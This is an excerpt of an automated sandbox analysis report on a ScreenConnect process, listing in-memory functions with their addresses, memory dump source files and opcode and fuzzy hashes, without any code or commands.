Function 042D7CF0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21c4a58bbdd53c4e47657befecafa57ffc8a2fb5054e9a09c984075a864e1c62
Instruction ID: 79be7c6827d9237955e3f612d26efae3e262315ec6704175e063b1a2d0a8df87
Opcode Fuzzy Hash: 21c4a58bbdd53c4e47657befecafa57ffc8a2fb5054e9a09c984075a864e1c62
Instruction Fuzzy Hash: DB715A347102058FD708EB7AC984A6BB7E6BFC83107248869E44ADB375DF75EC428B90

Function 00BEE308 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 577a51fb0b2cc13ff8882f516b1acaa6e79c56ad540ac1eafbe100caf688924a
Instruction ID: 971b05ff8d73656e04f642a3255b112e1277065937837ba2797e229cc95a26f3
Opcode Fuzzy Hash: 577a51fb0b2cc13ff8882f516b1acaa6e79c56ad540ac1eafbe100caf688924a
Instruction Fuzzy Hash: C6518D347002058FCB14DF6DD994A6EB7E6EF98304B1485A9F55ACB369EB74EC02CB90

Function 00BEE318 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582592b3588cf79a687b554f16b49bc651bdf0c4df53db1169df8c0acd0d7873
Instruction ID: 1644053e0abbf46e3717ff2c9b9695db222907ee967891816bdfccb64e033da9
Opcode Fuzzy Hash: 582592b3588cf79a687b554f16b49bc651bdf0c4df53db1169df8c0acd0d7873
Instruction Fuzzy Hash: B9517B347002068FCB14DF6DD99492EB7E6EF98300B1485A9F55ACB369EF74EC028B90

Function 00BE84A0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47773990cd4637110f587fb5403dfbddf4367fa04c300e460167bd96588de9d0
Instruction ID: d5adde836d93cf0e08b78a5fe1d9699a05f2fa9a9f82079221800798388515c2
Opcode Fuzzy Hash: 47773990cd4637110f587fb5403dfbddf4367fa04c300e460167bd96588de9d0
Instruction Fuzzy Hash: 2351F930600B41CFC724CF6AD894A66B7F2FF8D324B244A5CD49A9B7A4DB31E806CB44

Function 00BEB2D0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d134ab8a0dc59ddea6ca0ed16660a28e2db341ee599408a1279fc803a8fc4f0
Instruction ID: 799fbf2dd6e07ab45d7e7014039f91b45bd57248902a46fc97a09035b1f8fd04
Opcode Fuzzy Hash: 7d134ab8a0dc59ddea6ca0ed16660a28e2db341ee599408a1279fc803a8fc4f0
Instruction Fuzzy Hash: C0518D70E403099FDB01DFB9D884B9DBBB5EF89300F108569E404AB3A5EB75A996CB50

Function 00BEB2C0 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a7f317e69618935dfb280257901fa239ffb1027c94caaab1ecbb60109f2a04
Instruction ID: 0a6aabad6d883f043fcbd9fd9cb03d121b62024bcb7b9157c83ccc67994ce932
Opcode Fuzzy Hash: 67a7f317e69618935dfb280257901fa239ffb1027c94caaab1ecbb60109f2a04
Instruction Fuzzy Hash: 82514C70E502099FDB01DFA8D984BDDB7B5EF88300F108569E405BB3A4DB75A996CF50

Function 00BEEF67 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53ea356a68515edf25fd79322da6b44704a78c593fdcaf2014917da89ab2770b
Instruction ID: 402eb52e011cf1f083b64c581a1f7e9bad296a4360839cb12b5901fc5c7245c6
Opcode Fuzzy Hash: 53ea356a68515edf25fd79322da6b44704a78c593fdcaf2014917da89ab2770b
Instruction Fuzzy Hash: 81415031E0025A9BDB14DFA5C980BEEBBF5EF88700F148169E405B7381DB70AD46CB91

Function 00BE9968 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b5b2a0d02f185b8adb5d44576d871b6081facd20a5b456c76f56b6244fe79b
Instruction ID: e9376861b07e6905195edf0ffd7944b432d1ab69234a885c2ad6cbce44da1fbc
Opcode Fuzzy Hash: 17b5b2a0d02f185b8adb5d44576d871b6081facd20a5b456c76f56b6244fe79b
Instruction Fuzzy Hash: 85415B31B502108FCB14DBB9D898AADB7F2EF88310B1445A9E406EB3A1DF759D49CB90

Function 042DCDBE Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ae68cd40604122fbfdb08036d181a9a9832baec0ee762c637a16cb5eecf1c0
Instruction ID: 3c96ffba22d2acb43a985dfb163533d8d26f7b4c388651f09f411925174dde4a
Opcode Fuzzy Hash: 13ae68cd40604122fbfdb08036d181a9a9832baec0ee762c637a16cb5eecf1c0
Instruction Fuzzy Hash: E151F435E1072ACFDB21DF69C944A99F7B1FF89300F14869AD54DA7211EB70AA85CF80

Function 042DE120 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8dda934ef28fa89e8647d4c3832128a614e0a2ab991f614d8918ad000b0bf5d
Instruction ID: b6b2fe159029ac8d344ae0babbf7f697e1b64dcebdee3ae06caf72b44ef84eec
Opcode Fuzzy Hash: e8dda934ef28fa89e8647d4c3832128a614e0a2ab991f614d8918ad000b0bf5d
Instruction Fuzzy Hash: F8418E3171060A8FCB14EFB4C9588AEBBB5FF88304B044569D447D72A5EF30BA0ACB90

Function 00BE7920 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfdbf345ee146e703f971536ce75557ef1b8b91c27d2425e1a9002911706f17c
Instruction ID: 25dae1ad9d1b84089a4b134962e4c3d3c5b09e9d346254592734846dd36e1f89
Opcode Fuzzy Hash: bfdbf345ee146e703f971536ce75557ef1b8b91c27d2425e1a9002911706f17c
Instruction Fuzzy Hash: FE318131B442458BDB14DF6AC454AAEFBF6EF89354F1094AAE406E73A4DF31DD018790

Function 00BE9978 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9894c7a82a01b0ca9e7e6b56445f5664777d68e8302196bde8f49547a3b1672e
Instruction ID: 677ea09b268824c2cd0779a56f5e27fa7f69b8c17c27383cc667206041c90ca0
Opcode Fuzzy Hash: 9894c7a82a01b0ca9e7e6b56445f5664777d68e8302196bde8f49547a3b1672e
Instruction Fuzzy Hash: 5F415B307102048FCB14DBB9D858AAEB7F6EF88710B1045A9E406EB3A1DF70DD09CB90

Function 042DC875 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c47e732de3bca62d7c83aaf905c4bad700b3073e9409c9ce3d96723beb9ee34
Instruction ID: 081a73bf6f4351c6f0195f147f120583a9ee2aeb1d750fc1e60f68d6bf9045ab
Opcode Fuzzy Hash: 4c47e732de3bca62d7c83aaf905c4bad700b3073e9409c9ce3d96723beb9ee34
Instruction Fuzzy Hash: 47319071B502069BDB19EF69C591AAEB7E1EF88300F504839E419EB358DB70EC45CB80

Function 042DC8E3 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2234738e82b214e31b91562871938ba5418dcaa96ed59d51ee22120ff3b4573
Instruction ID: a993e6cd443e2d1382bddcc068c02a595ddbebb5c156dee10fc00c5841805e0a
Opcode Fuzzy Hash: f2234738e82b214e31b91562871938ba5418dcaa96ed59d51ee22120ff3b4573
Instruction Fuzzy Hash: AE31AE71B502059BDB15DF69C9916AEBAE2EF88300F504839E40AEB358DB70EC45CB90

Function 042DD900 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c68a71c81389013008477bc6c74db58d486c42966180237c6d32472d9bf1ca
Instruction ID: 336bb182018c0f5e92f7467a2e2a01e258144434db3ff7e72f7825c84f3e8d07
Opcode Fuzzy Hash: 80c68a71c81389013008477bc6c74db58d486c42966180237c6d32472d9bf1ca
Instruction Fuzzy Hash: D931D0713A43811FC706DB39989196ABBE6EFC530034885BAD005CF35ADE65EC098790

Function 042DCA30 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8978df49656d55d95739cf15ba5ecb6ee23e3a5e1e2738e0a6d13c9ed40b906
Instruction ID: e9d1af827c2a9c30638ee84d1b8c445cc10a97275237d5e511b63667df1c61cd
Opcode Fuzzy Hash: c8978df49656d55d95739cf15ba5ecb6ee23e3a5e1e2738e0a6d13c9ed40b906
Instruction Fuzzy Hash: C1316B71B402059FDB08EB69D991A9EBBE6EF89310F204579E406EB354DB70EC45CB90

Function 00BEDC08 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c1b90ddb2ad55c223ca1330a3656bfeb1078cedb1c325fa8da0cf6ce770660
Instruction ID: 16d8a5233a397e21cac791f38702cf87780f2e388e8fae534dd7ce9b0f155035
Opcode Fuzzy Hash: 71c1b90ddb2ad55c223ca1330a3656bfeb1078cedb1c325fa8da0cf6ce770660
Instruction Fuzzy Hash: D5313D706007458FC730DF6AC88466ABBF1FF89310B108B69D4969B7A5D7B0E946CF84

Function 00BE52F8 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25efb6fcc9636a039cced56f9518872ca4f49e2dfee5531662b9103ad88da1e4
Instruction ID: f7d9cdff445cb5a906f353ec2c3e3227e7288daed2d291344b52dae568316069
Opcode Fuzzy Hash: 25efb6fcc9636a039cced56f9518872ca4f49e2dfee5531662b9103ad88da1e4
Instruction Fuzzy Hash: 35319C72D003099FCB14DFAAC4446DEBBF4EF48320F10846AD419A7351D778A9458FA4

Function 042D6550 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a3dca01a01f3b1abe10338cdcdadc6438dc049ea7501fba67b21701acc1fcc
Instruction ID: 9dba2c8cbce6c8fd50737e06da6bfee0acaae9aa48a9f8083dbca71595d415b5
Opcode Fuzzy Hash: c8a3dca01a01f3b1abe10338cdcdadc6438dc049ea7501fba67b21701acc1fcc
Instruction Fuzzy Hash: B8314C347106058FCB34CF69D88896AB7F2EF89325B148A2CD4569B7A5DB31F849CBD0

Function 00BE6568 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3155e1fe2c5b90a6285d684e092b6c427cca95cf88f5ef16c4da1fff16acfac7
Instruction ID: 1aae4607f70c1eba23e32ead4715fc332f33582b0d7f079cc1beedcc68f2c5f5
Opcode Fuzzy Hash: 3155e1fe2c5b90a6285d684e092b6c427cca95cf88f5ef16c4da1fff16acfac7
Instruction Fuzzy Hash: 22312D306007458FC730DF6AC844A6ABBF1EFA9354B144A6CD456DB7A5DB30E946CF80

Function 00BE36B0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79003b88128b4c423e39700e55a56f0dcf8b48f7f3d29c85929c34f05c1d7b90
Instruction ID: 9c2ff722e6aaf4b11cb643ccdc87cfb7f533cdd647bcfe1968a7e16bae689b28
Opcode Fuzzy Hash: 79003b88128b4c423e39700e55a56f0dcf8b48f7f3d29c85929c34f05c1d7b90
Instruction Fuzzy Hash: CF3125B1A05245CFCB04EFB4D9885AEBBF5FF49310B1085A6D51ADB352EB309E41CB51

Function 00BEDC18 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f96fa31e28111608a80e688b59b26a9ecb5c178e51a35b4dca42f4a930cb8416
Instruction ID: 45e642e605f8da9d63f6bde62d5715d3dded131d534c4494b73a86348b95adf4
Opcode Fuzzy Hash: f96fa31e28111608a80e688b59b26a9ecb5c178e51a35b4dca42f4a930cb8416
Instruction Fuzzy Hash: 7E310B70600B458FC730DF6AD844666BBF1EF89310F208B69D0969B7A5D7B1E94ACF84

Function 042DCA40 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ab6685a8855e09b0dc232c20684a9b40542b1cbf3dc8ff2112c9cce11839836
Instruction ID: 919f72e4ce9eee06161ee2210c2a5ea5b53880fddc4fc4c9394d3c7b3abeb2f9
Opcode Fuzzy Hash: 8ab6685a8855e09b0dc232c20684a9b40542b1cbf3dc8ff2112c9cce11839836
Instruction Fuzzy Hash: F4316871B402059FCB18EB69C991A9EBBE6EF88310F104439E816EB354EB70EC45CB90

Function 00BE90A8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4285aa89dc3b1c123a1413676569273dc1b2cedb76d960c4afa7fa700ffe50d
Instruction ID: 46ddb600ed77c65be71e7351ae1857a72b918b9fdbc5cc20578f584548389a19
Opcode Fuzzy Hash: a4285aa89dc3b1c123a1413676569273dc1b2cedb76d960c4afa7fa700ffe50d
Instruction Fuzzy Hash: D9316D706007029FC730CF6AD888A6AB7F1EF89710B144A6CD496DB7A5D730E94ACB91

Function 00BEDDC0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46bfd4724e9ad13e008e3f2f579bce00c3ac0ee35020c531fe9dce4a34682267
Instruction ID: 42ceb0b1f3244c74a92e6eb3f6f74dfc632fea8b10e1935f65e46aa7f33e574d
Opcode Fuzzy Hash: 46bfd4724e9ad13e008e3f2f579bce00c3ac0ee35020c531fe9dce4a34682267
Instruction Fuzzy Hash: 16310A306007418FCB30DF6AC84866AB7F1EF99310B108A6DD496DB7A5D771E946CF90

Function 042DD928 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0daa2f7a918722dbb07733cc5258d05a869b9cf05e11bbf8a73481b6da313611
Instruction ID: 1260749cb44d7a7bdf2e4fa43cdcefe33bdbcc030d9c8feda3b9919915c19cf7
Opcode Fuzzy Hash: 0daa2f7a918722dbb07733cc5258d05a869b9cf05e11bbf8a73481b6da313611
Instruction Fuzzy Hash: 6021D3B17606022B8714EA3E999196EB7EAEFC47507448979E015DB348EFB1FC0987D0

Function 042DF50C Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdcf3ff5e944bd7edb8d15fa40839419bf9d507ed1871e5eff6bdac6e2b697d6
Instruction ID: f815ae895ffe893938770d247dfadc034408e83fbd103b04b2b350309d67a763
Opcode Fuzzy Hash: bdcf3ff5e944bd7edb8d15fa40839419bf9d507ed1871e5eff6bdac6e2b697d6
Instruction Fuzzy Hash: 8D317375A102148FDB58DF28CA94F59B7B2BF89304F1581D5E90A9B366DB30ED82CF50

Function 00ADD688 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3504427662.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_add000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dcfa945e0ea13a37dc7cc8f11a29485079ff063fba9bd5a982dc2f651c47f25
Instruction ID: 18b464a2de3e70c360bba96e1de6536e11d8ad6c92b13f0277da8972e1c2e549
Opcode Fuzzy Hash: 5dcfa945e0ea13a37dc7cc8f11a29485079ff063fba9bd5a982dc2f651c47f25
Instruction Fuzzy Hash: D3212275540200EFCB05DF14DAC4B2ABF65FB98314F24C6AEE80A4B356C336D856DBA2

Function 042DC999 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5865b8939d064e0cd6c0959bbafc910a632b1d58faf685563653a93bf8d0a554
Instruction ID: 3f242d52ae2dfa4720dc206fd0c0f1238096969ab953bab35ebb7864ef25fe43
Opcode Fuzzy Hash: 5865b8939d064e0cd6c0959bbafc910a632b1d58faf685563653a93bf8d0a554
Instruction Fuzzy Hash: 96218E30B502059BDB15DF69C591AAEBBE1EF88304F508839D416EB354DB31EC45CF90

Function 00BE8C20 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e6874704a1f782e8ebb42ccbb1b1ccdb0491bad90ab32ee7130646798bd67d1
Instruction ID: b3bfeefa05c9120925a52e7df145ffb8a89b5d975f84c8e1f77a4abb865fcf87
Opcode Fuzzy Hash: 4e6874704a1f782e8ebb42ccbb1b1ccdb0491bad90ab32ee7130646798bd67d1
Instruction Fuzzy Hash: F021A431B002055FCB05EB78D952BADB7A2EFC5310F148526E4069F795DB70AD05C7A2

Function 00BE36A0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 759952c1428c5e67cc649462fdb5109a2190d51cb2d089e303641396ded2f594
Instruction ID: 07ced4713d1e359772f9bf9c9f9570ff4dd02fd7cb8841283483ad2bd8b41711
Opcode Fuzzy Hash: 759952c1428c5e67cc649462fdb5109a2190d51cb2d089e303641396ded2f594
Instruction Fuzzy Hash: BE21DEB1A04291DFCB00EFB4DA8C46EBBF1EB88711B0481A5D816CB354EB309D42CB51

Function 042DDB98 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50d694a9696c803029a8bc3380c3b1abad4a2a5fd04ec0c09258cf78d4dc304f
Instruction ID: 917440656d06af0b1be9f3a06adf4f8fee35f90a610f396027d6f6ce998229d3
Opcode Fuzzy Hash: 50d694a9696c803029a8bc3380c3b1abad4a2a5fd04ec0c09258cf78d4dc304f
Instruction Fuzzy Hash: 8D21B070F3551A9BDB14CFA4D894BADBBB5FF48710F104129E412E7291EBF1A841CB54

Function 00BEE198 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a2276964391c070d7a74b7b3efa7d27389e6a122a39de7e05e3e72aca28e41
Instruction ID: e694b09ac90dd15754e4e15501cbc1c001be6ccaef3b4414753e4d8265263d09
Opcode Fuzzy Hash: e9a2276964391c070d7a74b7b3efa7d27389e6a122a39de7e05e3e72aca28e41
Instruction Fuzzy Hash: BE214F71B002099FCB10DF69D985AAEBBF1FF84310B108526E5299B355DB31ED05CF94

Function 00BE86D0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c41115362e0cbf8f62d762286eedd0aac7cac9e062c577aa210484561780aa
Instruction ID: ce2d6f6d2640c78a770571a0ae4617458db03ac6217d912cbe3575dd4cbd5fff
Opcode Fuzzy Hash: 56c41115362e0cbf8f62d762286eedd0aac7cac9e062c577aa210484561780aa
Instruction Fuzzy Hash: 13210E34600A458FC734CF66D844A96B7F1EF84320B208B6DD497976A1DB31ED4ACF90

Function 00BEED68 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5db524a42d5b0f97d321492fc90ab5ec9f6e310497e306794858b9e6c0f3c63
Instruction ID: e40b6e69da05ef65d60b84bde389eacafb8db03732f8fe96c1b10cc45cff3ff3
Opcode Fuzzy Hash: a5db524a42d5b0f97d321492fc90ab5ec9f6e310497e306794858b9e6c0f3c63
Instruction Fuzzy Hash: EC214C32D1470A9DCB10EFB9D8505EAFBB0EF99300F10C66AE559A7111FB70A695CB81

Function 00BEF2CC Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a106e2d465bd05f5efd12962a6cd624319f269935d96c41559d2745b3ea8cc1e
Instruction ID: e6e1c20fdc012d3827265b8468ac43c74f34735f6a769d60a364fe8145490646
Opcode Fuzzy Hash: a106e2d465bd05f5efd12962a6cd624319f269935d96c41559d2745b3ea8cc1e
Instruction Fuzzy Hash: 6921597680024ADFCB10CF9AD844ADEBBF1FF48310F14846AE954A7251C339A555DFA1

Function 00BEF878 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32029094933e6bee366fffae4525756179592f3934b525466b87adea215187e7
Instruction ID: c1f735160109d1cf9ede2db31bf3a655ffd5ae5f3d02c7426ec52feb683c6387
Opcode Fuzzy Hash: 32029094933e6bee366fffae4525756179592f3934b525466b87adea215187e7
Instruction Fuzzy Hash: 3A21287680024ADFCB10CF9AD844ADEBBF1FF88310F14842AE954A7251C335A555DFA1

Function 00BEA7B0 Relevance: .1, Instructions: 62COMMON

